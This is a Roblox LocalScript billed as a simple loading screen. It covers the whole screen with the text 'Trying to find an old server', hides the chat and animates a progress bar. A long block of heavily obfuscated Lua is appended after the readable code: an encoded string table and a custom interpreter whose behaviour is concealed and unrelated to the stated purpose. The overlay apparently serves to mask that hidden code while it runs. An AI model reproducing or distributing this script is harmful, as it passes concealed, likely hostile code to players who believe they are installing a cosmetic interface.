--[[
  Roblox Loading Screen Script (English Version)
  - Covers the entire screen (including the chat bar and settings)
  - Centered white text: "Trying to find an old server"
  - White horizontal bar slowly animates from left to right beneath the text
  - Solid black background
  - Easy to use: just place this LocalScript in StarterGui

  To remove the loading screen later, call: screenGui:Destroy()
--]]

local Players = game:GetService("Players")
local player = Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")

-- Create ScreenGui
local screenGui = Instance.new("ScreenGui")
screenGui.IgnoreGuiInset = true
screenGui.ResetOnSpawn = false
screenGui.Name = "LoadingScreen"
screenGui.DisplayOrder = 10000 -- Always on top
screenGui.Parent = playerGui

-- Black background
local background = Instance.new("Frame")
background.BackgroundColor3 = Color3.new(0,0,0)
background.Size = UDim2.new(1,0,1,0)
background.Position = UDim2.new(0,0,0,0)
background.BorderSizePixel = 0
background.Parent = screenGui

-- Centered white text
local textLabel = Instance.new("TextLabel")
textLabel.Size = UDim2.new(1, 0, 0, 50)
textLabel.Position = UDim2.new(0, 0, 0.45, 0)
textLabel.BackgroundTransparency = 1
textLabel.Text = "Trying to find an old server"
textLabel.TextColor3 = Color3.new(1,1,1)
textLabel.Font = Enum.Font.GothamBold
textLabel.TextSize = 32
textLabel.TextStrokeTransparency = 0.5
textLabel.TextWrapped = true
textLabel.Parent = screenGui

-- White progress bar background (faded)
local barBack = Instance.new("Frame")
barBack.Size = UDim2.new(0.3, 0, 0, 8)
barBack.Position = UDim2.new(0.35, 0, 0.53, 0)
barBack.BackgroundTransparency = 0.5
barBack.BackgroundColor3 = Color3.new(1,1,1)
barBack.BorderSizePixel = 0
barBack.Parent = screenGui

-- Animated white bar
local bar = Instance.new("Frame")
bar.Size = UDim2.new(0, 0, 1, 0)
bar.Position = UDim2.new(0, 0, 0, 0)
bar.BackgroundColor3 = Color3.new(1,1,1)
bar.BorderSizePixel = 0
bar.Parent = barBack

-- Hide chat bar if it appears
local function hideChat()
    local chat = playerGui:FindFirstChild("Chat")
    if chat then
        chat.Enabled = false
    end
end

hideChat()
playerGui.ChildAdded:Connect(function(child)
    if child.Name == "Chat" then
        child.Enabled = false
    end
end)

-- Animate the white bar
local speed = 2 -- seconds to go from left to right
local TweenService = game:GetService("TweenService")
local function animateBar()
    while screenGui.Parent do
        bar.Size = UDim2.new(0, 0, 1, 0)
        bar.Position = UDim2.new(0, 0, 0, 0)
        bar.BackgroundTransparency = 0
        -- Tween from left to right
        local tweenInfo = TweenInfo.new(speed, Enum.EasingStyle.Linear)
        local tween = TweenService:Create(
            bar,
            tweenInfo,
            {Size = UDim2.new(1,0,1,0)}
        )
        tween:Play()
        tween.Completed:Wait()
        -- Quick fade out and repeat
        for i = 0, 1, 0.1 do
            bar.BackgroundTransparency = i
            wait(0.01)
        end
        wait(0.2)
    end
end

spawn(animateBar)

-- To remove the loading screen later, just use:
-- game.Players.LocalPlayer.PlayerGui.LoadingScreen:Destroy()
return(function(...)local E={"\052\082\078\115\072\085\119\056\119\065\061\061","\074\048\099\102\088\112\084\061";"\119\079\047\105\049\079\110\061","\072\068\078\122\104\112\116\090","\057\074\051\056\072\053\116\089\049\112\110\061";"\083\079\051\066\117\098\056\066\087\108\050\081\057\074\121\051","\057\079\047\107\072\079\057\122\113\085\078\056\119\079\057\106\119\079\057\066\113\087\061\061","\083\048\121\051\101\110\047\087\087\053\119\115\103\117\056\052\104\110\071\061","\088\074\120\122\049\068\113\061","\049\079\099\089\088\082\051\115\072\053\056\070\088\050\061\061","\119\079\099\081\119\082\120\075\049\053\072\061";"\074\048\099\075\049\053\078\056\101\065\061\061","\049\112\047\115\104\065\061\061";"\119\079\099\070\119\112\048\105\088\074\113\061";"\072\108\057\115\049\112\057\115\118\074\078\089\118\053\043\056";"\088\108\048\089\119\079\051\069","","\119\066\057\108\051\068\121\079\112\047\066\122\078\110\072\043";"\072\053\047\070\088\079\099\107";"\088\053\043\109\049\068\113\061";"\049\098\085\061","\119\112\116\050\118\112\051\080","\057\057\120\083";"\103\105\114\056\088\111\069\075\103\114\061\061";"\118\108\089\089\072\114\061\061";"\074\048\099\090\118\050\061\061";"\112\082\088\052\088\085\099\053\078\098\087\061","\119\079\047\081\104\050\061\061";"\052\112\088\048\052\048\069\061","\072\110\099\105\051\090\088\053\087\110\107\109\057\056\056\080","\055\115\089\100\100\108\113\061","\103\114\061\061","\088\108\047\107\088\087\061\061","\119\048\121\087\101\112\048\043\049\074\075\110\119\117\089\097\072\087\061\061","\056\101\052\049\072\048\083\074\075\114\061\061","\049\098\113\061";"\074\048\099\107\088\074\078\089\119\079\047\105\049\079\110\061";"\118\090\056\115\088\087\061\061","\086\090\100\053\102\048\087\051\082\089\109\097\107\053\073\066\099\105\068\077\075\047\043\043\081\089\075\053\077\101\079\116\121\084\116\089\102\049\073\075\120\068\099\111\081\071\054\106\120\082\101\114\113\080\106\088\082\073\079\111\056\069\108\121\105\108\049\076\080\108\090\073\051\070\080\078\069\065\087\054\087\077\078\088\054\115\066\089\065\104\110\117\069\050\052\074\068\054\084\082\087\051\098\083\084\090\114\119\081\107\118\089";"\088\068\051\048\118\114\061\061";"\053\051\107\083\077\055\122\110\120\083\119\066\051\107\118\101\086\121\115\115\053\047\107\047\072\112\050\074\105\116\113\105\080\081\071\097\067\057\068\050\056\068\084\061","\078\053\071\122\101\110\056\081\117\115\120\055\052\115\057\112\083\110\069\061","\049\079\119\066\110\057\057\122\049\050\061\061";"\118\108\099\070\118\108\047\115","\087\056\057\122\049\115\107\082\088\066\051\121\057\108\085\116\078\065\061\061","\072\079\051\089\049\079\050\061";"\101\112\119\052\052\106\066\108\083\082\047\068\110\110\099\088\119\087\061\061";"\083\106\118\048\104\048\119\112\052\047\051\104\078\053\078\118\110\048\110\061","\088\117\057\052\083\053\102\068\110\079\048\054\049\115\066\084\110\050\061\061","\083\043\070\121\079\090\065\097\081\070\070\103\075\109\084\120\106\120\074\112\075\119\072\121\088\073\088\057\065\081\072\051\070\088\109\074\088\049\115\075\065\099\077\116\104\101\048\069\121\107\043\057\101\074\075\048\118\111\112\086\100\052\048\119\051\110\067\110\073\121\090\071\056\053\069\083\118\078\111\085\085\083\108\079\079\068\118\069\084\068\076\076\054\112\085\074\089\065\043\050\068\052\070\121\048\074\069\118\055\108\120\055","\112\117\114\048\112\057\056\050\119\079\056\111\117\056\047\103";"\107\073\113\054\075\116\049\120\103\114\051\086\054\116\105\048\114\043\078\077\103\081\066\115\107\101\090\073\084\067\068\076\114\086\067\118\115\082\067\079\069\052\069\050\110\071\089\085\069\106\053\074\073\073\076\104\101\068\083\100\087\112\106\102\088\099\068\108\073\055\122\114\074\076\072\116\071\078\119\074\117\122\102\054\105\053\048\084\114\085\113\072","\057\108\057\105\104\079\099\109\104\050\061\061","\072\053\057\107\049\068\088\056";"\117\068\121\105\057\085\120\053\052\114\061\061";"\049\079\057\070";"\049\110\084\043\052\115\088\104\087\108\119\081\052\108\056\075"}local function b(b)return E[b+(394092+-333065)]end for b,Y in ipairs({{98980-98979,857780-857723},{636917-636916,132266-132260};{-663662-(-663669);-407348-(-407405)}})do while Y[-717046+717047]<Y[-489965-(-489967)]do E[Y[-569010+569011]],E[Y[710136-710134]],Y[185703-185702],Y[-6688+6690]=E[Y[552305+-552303]],E[Y[561266-561265]],Y[754872-754871]+(469296-469295),Y[261096+-261094]-(-407468-(-407469))end end do local b=math.floor local Y=string.len local c=E local O={m=-577906+577953,X=93692-93667,["\054"]=-740269-(-740279),v=-39457+39481,S=-49186+49198,["\053"]=-267394-(-267432),["\056"]=412333+-412296;h=593932-593906;M=398892+-398833;Z=-31841+31880;L=-210023+210038,V=780279-780216,U=-432873-(-432877),a=976062+-976004,K=1002216-1002175,I=-766072+766134,o=289579-289577,["\055"]=145381+-145370;H=-860603+860631;Q=-277046-(-277097);c=456302+-456241;q=-957118+957126,B=-856535-(-856571),C=-275625+275656;j=-640500+640535,O=910268+-910262,["\050"]=249256+-249208,i=450542+-450508,s=-232743+232795,["\052"]=-190502+190520;["\051"]=830471-830458,x=34849+-34840,g=-238439+238453;l=-767736+767790,J=-667957+667980,N=-169957+169974,Y=882299+-882266,F=466652-466606,R=-515945-(-515952);k=289878-289833;f=-649032-(-649076);["\049"]=635828+-635801;d=-324352-(-324394),w=-392940+392969;D=-501305-(-501360),p=-576092-(-576114),u=-152274-(-152293);P=941693+-941650,T=-605627-(-605683),["\043"]=-125043-(-125092),["\047"]=-506091-(-506096);t=-532920-(-532977),n=381696-381676;["\057"]=184678+-184657,e=-845882+845912;["\048"]=-891196+891249;E=1005927-1005887;G=-380400-(-380460);W=-36257+36273;A=844730+-844730,b=-224103+224106;z=802745+-802695,r=-1037440+1037472,y=-143779-(-143780)}local l=type local h=string.char local w=table.concat local g=string.sub local V=table.insert for E=797497+-797496,#c,43361+-43360 do local u=c[E]if l(u)=="\115\116\114\105\110\103"then local l=Y(u)local I={}local X=-108515+108516 local C=509808-509808 local B=585458+-585458 while X<=l do local E=g(u,X,X)local Y=O[E]if Y then C=C+Y*(378796-378732)^((-567151-(-567154))-B)B=B+(474992-474991)if B==422577-422573 then B=-840506+840506 local E=b(C/(79714+-14178))local Y=b((C%(-839740-(-905276)))/(-495919+496175))local c=C%(-473007+473263)V(I,h(E,Y,c))C=-895932+895932 end elseif E=="\061"then V(I,h(b(C/(255142-189606))))if X>=l or g(u,X+(653045-653044),X+(-289512-(-289513)))~="\061"then V(I,h(b((C%(680819-615283))/(-601011+601267))))end break end X=X+(622132-622131)end c[E]=w(I)end end end return(function(E,c,O,l,h,w,g,v,I,R,B,z,u,Y,n,K,V,C,X,N,x,G)Y,G,K,I,n,z,v,V,x,R,C,u,B,N,X=function(Y,O,l,h)local q,j,F,u,S,C,o,a,r,K,t,d,P,y,D,T,f,g,s,e,X,L,k,B,Q,U,H,W,p,i,m,M,A,J while Y do if Y<8760191-(-992447)then if Y<178342+5535179 then if Y<1830586-(-357867)then if Y<2433835-961662 then if Y<623976-(-458030)then if Y<-531184+921254 then if Y<798663-761336 then Y=V[l[984008-983998]]X=V[l[717377-717366]]u[Y]=X Y=V[l[435373+-435361]]X={Y(u)}Y=E[b(577257-638260)]g={c(X)}else Y=j g=L Y=L and 14017036-414829 or 15570620-(-982846)end else C=b(793145+-854163)Y=E[b(-15008+-45962)]X=E[C]C=b(464144-525168)u=X[C]C=V[l[554929+-554928]]X={u(C)}g={c(X)}end else if Y<-959294+2204037 then Y=V[l[-136291-(-136292)]]X=C W=-123492-(-123492)L=303912-303657 q=Y(W,L)u[X]=q Y=-633588+16864484 X=nil else Y=V[l[914947-914940]]Y=Y and 736887+7371392 or 10037395-421741 end end else if Y<1281485-(-529904)then if Y<1368340-(-359339)then if Y<-769208+2268008 then H=not a j=j+t W=j<=L W=H and W H=j>=L H=a and H W=H or W H=631540+14320341 Y=W and H W=-98915+5722382 Y=Y or W else g=o Y=i Y=13352503-(-890236)end else C=447022+-446873 X=V[l[-485871+485873]]u=X*C X=-935293+25610598752936 g=u+X u=35184372160418-71586 Y=g%u X=109988-109987 V[l[493745-493743]]=Y Y=-85923+6006872 u=V[l[331818+-331815]]g=u~=X end else if Y<1356343-(-796153)then T=s U=T H[T]=U Y=557489+13712387 T=nil else g=868731+15463544 X=b(-227239-(-166245))C=3914968-(-552369)u=X^C Y=g-u u=Y g=b(-474799+413807)Y=g/u g={Y}Y=E[b(-986940-(-925949))]end end end else if Y<3909963-(-547825)then if Y<-127524+4117522 then if Y<-474863+4155879 then if Y<2363151-(-485615)then Y=-666933+6500327 else Y=N(1312776-(-977982),{B})A={Y()}g={c(A)}Y=E[b(972459-1033472)]end else g={}Y=E[b(-687587-(-626611))]end else if Y<3589876-(-535281)then m=-40347-(-40353)y=785400+-785399 Y=V[q]A=Y(y,m)m=b(-185821-(-124836))Y=b(-73826+12841)E[Y]=A y=E[m]m=-466604-(-466606)Y=y>m Y=Y and 12461148-13024 or 12604769-319466 else g=13610047-(-695670)X=b(965454-1026432)C=11539585-(-1043712)u=X^C Y=g-u g=b(-779989-(-718966))u=Y Y=g/u g={Y}Y=E[b(-790264+729277)]end end else if Y<5782830-186214 then if Y<783608+3800441 then Y=true Y=-369131+3895894 else g=b(802041+-863048)B=b(476127-537137)Y=E[g]u=V[l[868415-868411]]L=R(4839540-404461,{})C=E[B]W=b(-844730+783755)q=E[W]W={q(L)}q=-418029+418031 r={c(W)}K=r[q]B=C(K)C=b(-762616+701619)X=u(B,C)u={X()}g=Y(c(u))X=V[l[-560940-(-560945)]]Y=X and 10713831-(-875131)or 13374905-(-301033)u=g g=X end else if Y<5213287-(-444910)then B=nil q=nil Y=291177+5389636 r=nil else Y=E[b(-174309+113337)]g={X}end end end end else if Y<7352722-20321 then if Y<7377615-1001279 then if Y<-879931+7069204 then if Y<6612601-741303 then if Y<5875343-29857 then Y=true Y=Y and 934077+14031116 or 12964524-(-423661)else g=b(-354155+293144)X=b(466164-527152)Y=E[g]u=E[X]q=b(14048+-75074)B=V[l[-76898+76899]]W=23128030663226-(-295401)K=V[l[-860793-(-860795)]]r=K(q,W)C=B[r]B=b(357905-418925)B=u[B]X={B(u,C)}g=Y(c(X))Y=g()g={}Y=E[b(428461+-489434)]end else X=V[l[129252+-129249]]C=-417005+417081 u=X*C Y=-689717+7635209 X=424174-423917 g=u%X V[l[337389-337386]]=g end else if Y<402860+5875184 then A=V[X]f=A Y=A and-360619+14226002 or 14161744-(-488047)else Y=11830282-381100 end end else if Y<-838522+7572113 then if Y<607795+5946299 then e=-419501+419503 Y=330794+1293831 J=D[e]e=V[d]P=J==e o=P else i=Y e=879803+-879802 J=D[e]e=false P=J==e o=P Y=P and 6825264-354411 or 663475-(-961150)end else if Y<252520+6509025 then S=z(S)p=z(p)D=nil F=z(F)k=z(k)U=z(U)d=z(d)Y=10212695-(-407021)else C=449327-449326 X=V[l[-997759+997762]]u=X~=C Y=u and 6673963-(-727223)or 5335107-(-585842)end end end else if Y<9991771-724726 then if Y<255656+7613510 then if Y<-438062+8010377 then if Y<-66850+7461987 then Y=-810745+10804778 else X=V[l[238442-238439]]C=-950365-(-950397)t=-243560+243573 u=X%C B=V[l[236583+-236579]]L=338666+-338664 q=V[l[-323498+323500]]T=V[l[-357608-(-357611)]]H=T-u T=-243368+243400 a=H/T j=t-a W=L^j r=q/W K=B(r)B=4294150151-(-817145)C=K%B K=314604-314602 B=K^u X=C/B W=314986+-314985 B=V[l[692661+-692657]]q=X%W W=4293955841-(-1011455)r=q*W K=B(r)B=V[l[-936569-(-936573)]]r=B(X)C=K+r q=-521008+586544 K=388652+-323116 B=C%K r=C-B L=664565-664309 K=r/q q=-780024+780280 r=B%q W=B-r q=W/L L=-101155+101411 t=-922877-(-923133)W=K%L u=nil X=nil j=K-W Y=539184-44577 L=j/t j={r;q;W;L}q=nil K=nil B=nil W=nil r=nil L=nil V[l[-409965+409966]]=j C=nil end else Y=true Y=Y and-492079+7881488 or 3736401-209638 end else if Y<792057+7680442 then u=b(-970704-(-909692))C=576818+-576818 Y=E[u]X=V[l[-444070-(-444078)]]u=Y(X,C)Y=9343934-(-271720)else Y=V[l[502512+-502511]]X=O[518706-518704]C=Y u=O[877436-877435]Y=C[X]Y=Y and-26401+10324059 or 12678243-(-710454)end end else if Y<-736119+10324413 then if Y<576626+8826853 then k=I()S=b(-731895+670887)V[k]=f g=E[S]M=-1031984-(-1041984)S=b(461166+-522168)Y=g[S]U=103943-103843 S=465135-465134 g=Y(S,U)D=-969660-(-969662)S=I()V[S]=g Y=V[q]P=b(-506224+445214)p=-997247+997502 U=-40865+40865 g=Y(U,p)U=I()V[U]=g Y=V[q]F=V[S]p=-791353+791354 Q=582066-582066 g=Y(p,F)p=I()d=116581-116580 V[p]=g g=V[q]F=g(d,D)D=b(1038144+-1099133)g=-651571-(-651572)Y=F==g g=b(-725818-(-664821))F=I()V[F]=Y i=E[P]J=V[q]e={J(Q,M)}Y=b(806201+-867182)Y=T[Y]P=i(c(e))i=b(-465774+404785)o=P..i d=D..o Y=Y(T,g,d)d=I()V[d]=Y o=v(13561725-(-1022528),{q,k;j;C;X;s,F,d,S;p;U;L})D=b(227066-288041)g=E[D]D={g(o)}Y={c(D)}D=Y Y=V[F]Y=Y and-393196+14662048 or 12226517-(-751031)else Y=-952638+10946671 end else if Y<-506160+10135903 then Y={}C=V[l[561594-561585]]X=331627-331626 B=C u=Y C=-833529-(-833530)K=C C=-388396+388396 Y=618483+15612413 r=K<C C=X-K else s=#H m=-786872-(-786872)Y=-705654+12192213 T=s==m end end end end end else if Y<13494271-142244 then if Y<-1046848+12574985 then if Y<10641908-(-101795)then if Y<9284718-(-854202)then if Y<890876+9094406 then if Y<10976414-1020032 then g=b(-342717-(-281705))Y=E[g]u=b(89635+-150649)g=Y(u)Y=E[b(-939901+878922)]g={}else P=-428397+428398 i=D[P]Y=-318250+15819011 o=i end else Y=true Y=Y and 694518+3352453 or-824058+4773746 end else if Y<10233992-(-179302)then Y=6106842-426029 else k=not m f=f+y g=f<=A g=k and g k=f>=A k=m and k g=k or g k=-905404+10237401 Y=g and k g=-526000+6719853 Y=Y or g end end else if Y<11062355-(-318570)then if Y<353131+10647667 then H=nil T={}s=I()V[s]=T P=nil T=I()m=G(12475357-(-380332),{s;L,j,K})V[T]=m F=b(-886459+825450)k=I()S=b(652532+-713538)K=z(K)m={}V[k]=m W=nil m=E[S]q=nil d=V[k]D=b(994879+-1055863)p={[F]=d;[D]=P}r=nil U={}S=m(U,p)m=n(-888252+10123478,{k;s;a,L;j,T})L=z(L)T=z(T)V[X]=S C=nil r=b(333610+-394603)g={}t=nil V[B]=m a=z(a)s=z(s)K=E[r]q=V[X]j=z(j)k=z(k)t=125348+18581669206517 W=V[B]j=b(475187-536177)L=W(j,t)r=q[L]W=b(646396-707382)C=K[r]r=x(-413805+6278432,{X;B})K=C(r)K=V[X]L=13661634980461-833722 r=V[B]q=r(W,L)C=K[q]L=b(-582258+521278)j=10486481723497-(-951741)K=b(420183-481199)E[K]=C r=V[X]q=V[B]s=b(810425+-871396)W=q(L,j)K=r[W]t=1043648+13559624516756 r=b(-619827+558802)E[r]=K j=b(635060+-696042)q=V[X]W=V[B]L=W(j,t)j=b(-492137-(-431149))m=58082+28151148446599 W=b(-177125+116114)r=q[L]q=b(-122984-(-61986))E[q]=r q=E[W]L=E[j]a=V[X]Y=E[b(589638-650612)]H=V[B]T=H(s,m)t=a[T]a=b(-124222-(-63202))a=L[a]j={a(L,t)}W=q(c(j))q=W()X=z(X)B=z(B)else Y=true V[l[-730359+730360]]=Y g={}Y=E[b(-951577-(-890556))]end else if Y<120100+11340348 then j=z(j)W=nil C=z(C)a=nil L=z(L)K=z(K)q=z(q)t=nil B=z(B)T=nil r=nil Y=14198162-(-71714)B=I()H=nil X=z(X)W=b(-12665-48353)s=z(s)q=b(403885+-464893)r=b(-131236+70228)C=nil L=b(-678540-(-617523))X=nil V[B]=X X=I()V[X]=C K=E[r]r=b(689589+-750590)C=K[r]K=I()V[K]=C r=E[q]H={}q=b(247456-308458)C=r[q]q=E[W]a=I()W=b(-343147+282123)r=q[W]j=I()W=E[L]s=-652468+652724 L=b(304423-365419)q=W[L]W=776184-776184 t={}L=I()V[L]=W W=463856-463854 V[j]=W W={}m=s V[a]=t T=-859579+859580 t=-141988+141988 s=-525871-(-525872)k=s s=339819+-339819 S=k<s s=T-k else m=#H s=-769912+769913 U=-350507+350508 T=C(s,m)Y=15953991-270952 s=r(H,T)T=nil m=V[a]S=s-U k=q(S)m[s]=k s=nil end end end else if Y<13098138-647988 then if Y<11752097-(-250344)then if Y<12824844-964286 then if Y<249192+11369000 then Y=13371321-(-304617)C=V[l[-315300-(-315306)]]X=C==u g=X else H=b(-191998-(-130980))a=E[H]H=b(696880-757879)t=a[H]Y=32545+112355 L=t end else r=V[K]g=r Y=14007436-734967 end else if Y<11546333-(-862715)then m=b(888956+-949941)Y=E[m]m=b(126372+-187372)E[m]=Y Y=-75618+9634950 else y=b(719094+-780104)k=b(-141482-(-80482))Y=E[y]m=E[k]y=Y(m)Y=b(820354-881339)E[Y]=y Y=9682376-123044 end end else if Y<12208486-(-671221)then if Y<13467348-659828 then K=I()Y=true u=O X=I()V[X]=Y C=b(-250047-(-189030))g=E[C]C=b(-574077-(-513072))Y=g[C]C=I()q=b(748874-809849)V[C]=Y B=I()Y=x(10333723-402156,{})V[B]=Y Y=false W=v(-859771+12153300,{K})V[K]=Y r=E[q]q=r(W)g=q Y=q and 11357690-(-535409)or 13078255-(-194214)else u=V[l[-840697-(-840698)]]g=#u u=640628+-640628 Y=g==u Y=Y and 766328+1027262 or-883963+1378570 end else if Y<-694710+13829390 then i=V[X]o=i Y=i and 10864172-895228 or 15181487-(-319274)else q=b(-1025024+964016)r=g W=b(-1017368-(-956350))g=E[q]q=b(-357163+296161)Y=g[q]q=I()V[q]=Y g=E[W]W=b(271976+-332953)a=b(822945-883963)Y=g[W]W=Y j=Y t=E[a]Y=t and 11682821-(-46433)or-609395-(-754295)L=t end end end end else if Y<317546+14326165 then if Y<14604556-371628 then if Y<-418797+14032377 then if Y<-458926+13873153 then if Y<72738+13315581 then g={}Y=E[b(730615+-791630)]else j=-186469-(-186470)Y={}V[l[-323752-(-323754)]]=Y K=35184372200355-111523 g=V[l[-964286+964289]]q=-95907+96162 B=g g=X%K V[l[701882-701878]]=g r=X%q q=-419435-(-419437)W=b(-439086+378069)K=r+q V[l[692917+-692912]]=K q=E[W]W=b(-449134+388112)r=q[W]q=r(u)t=j r=b(962494+-1023498)j=-390956-(-390956)a=t<j Y=851450-(-622643)C[X]=r r=-364715+364769 W=-869883+869884 L=q j=W-t end else t=774521-774456 L=I()V[L]=g y=b(-782664-(-721654))j=-671538-(-671541)Y=V[q]g=Y(j,t)j=I()V[j]=g Y=634484+-634484 T=G(1226244-(-959038),{})t=Y Y=-722038-(-722038)a=Y H=b(280572-341547)g=E[H]H={g(T)}g=675511-675509 Y={c(H)}H=Y Y=H[g]T=Y g=b(382303-443310)Y=E[g]s=V[C]A=E[y]y=A(T)A=b(-104486-(-43489))f=s(y,A)s={f()}g=Y(c(s))s=I()V[s]=g f=V[j]A=f f=-640179-(-640180)y=f f=-649396+649396 Y=1015167+9604549 g=-506288+506289 m=y<f f=g-y end else if Y<752759+13028127 then u=nil V[l[-689008-(-689013)]]=g Y=820601+638643 else A=t==a f=A Y=14234450-(-415341)end end else if Y<-956606+15225999 then if Y<13566146-(-690613)then Y=5929109-(-819769)V[X]=g else o=V[X]Y=o and 726647+5990998 or 14651616-408877 g=o end else if Y<13683250-(-827770)then U=not S s=s+k T=s<=m T=U and T U=s>=m U=S and U T=U or T U=2896824-1042816 Y=T and U T=835770+8796268 Y=Y or T else B=438575-438574 X=V[l[-778999-(-779000)]]K=488881-488879 C=X(B,K)X=-381163-(-381164)u=C==X g=u Y=u and 7328+15811395 or-809849+17436021 end end end else if Y<16448777-676597 then if Y<14920586-(-409389)then if Y<14518436-(-443054)then if Y<15342188-639284 then V[X]=f Y=V[X]Y=Y and 6905906-564593 or-130788+4643693 else W=j y=b(-882619+821602)A=E[y]y=b(-1030965-(-969982))f=A[y]A=f(u,W)f=V[l[-665973+665979]]y=f()s=A+y T=s+r y=904509-904508 s=985791-985535 H=T%s s=C[X]r=H A=r+y f=B[A]Y=925181+548912 W=nil T=s..f C[X]=T end else g=b(-884851-(-823866))u=b(-566520-(-505520))Y=E[g]g=E[u]u=b(387110-448110)E[u]=Y u=b(50082+-111067)E[u]=g u=V[l[743928-743927]]Y=632244+5201150 X=u()end else if Y<-783160+16436833 then Q=103267+-103266 V[X]=o e=V[p]J=e+Q P=D[J]i=t+P P=-802297-(-802553)Y=i%P J=V[U]t=Y P=a+J J=373740-373484 i=P%J Y=-301545+7050423 a=i else m=-817913+817913 s=#H T=s==m Y=T and 11266233-308074 or-178406+11664965 end end else if Y<87779+16147646 then if Y<16779551-640820 then Y=g and 4626605-(-462318)or 226407+1232837 else q=not r C=C+K X=C<=B X=q and X q=C>=B q=r and q X=q or X q=2009629-835578 Y=X and q X=899900+-880444 Y=Y or X end else if Y<182950+16427493 then j=b(-615096-(-554097))Y=14138832-536625 L=E[j]g=L else Y=148197+15670526 X=V[l[916796+-916794]]C=V[l[586418+-586415]]u=X==C g=u end end end end end end end Y=#h return c(g)end,function(E,b)local c=C(b)local O=function(O,l,h,w)return Y(E,{O,l;h;w},b,c)end return O end,function(E,b)local c=C(b)local O=function(...)return Y(E,{...},b,c)end return O end,function()X=(177381+-177380)+X u[X]=-959038+959039 return X end,function(E,b)local c=C(b)local O=function(O,l,h,w,g,V)return Y(E,{O,l,h;w,g,V},b,c)end return O end,function(E)u[E]=u[E]-(-542768-(-542769))if u[E]==641524-641524 then u[E],V[E]=nil,nil end end,function(E,b)local c=C(b)local O=function(O,l)return Y(E,{O,l},b,c)end return O end,{},function(E,b)local c=C(b)local O=function()return Y(E,{},b,c)end return O end,function(E,b)local c=C(b)local O=function(O,l,h,w,g)return Y(E,{O;l;h,w;g},b,c)end return O end,function(E)for b=80610+-80609,#E,71139-71138 do u[E[b]]=u[E[b]]+(-680244-(-680245))end if O then local Y=O(true)local c=h(Y)c[b(-757575-(-696566))],c[b(98211+-159206)],c[b(-275138-(-214119))]=E,B,function()return-727799+1996958 end return Y else return l({},{[b(-35425+-25570)]=B;[b(-28257+-32752)]=E;[b(1012927+-1073946)]=function()return 685493+583666 end})end end,{},function(E)local b,Y=-960446+960447,E[-72993-(-72994)]while Y do u[Y],b=u[Y]-(-190757-(-190758)),(-185189-(-185190))+b if 639028-639028==u[Y]then u[Y],V[Y]=nil,nil end Y=E[b]end end,function(E,b)local c=C(b)local O=function(O,l,h)return Y(E,{O,l;h},b,c)end return O end,518256-518256 return(K(11819336-(-632884),{}))(c(g))end)(getfenv and getfenv()or _ENV,unpack or table[b(204838+-265837)],newproxy,setmetatable,getmetatable,select,{...})end)(...)
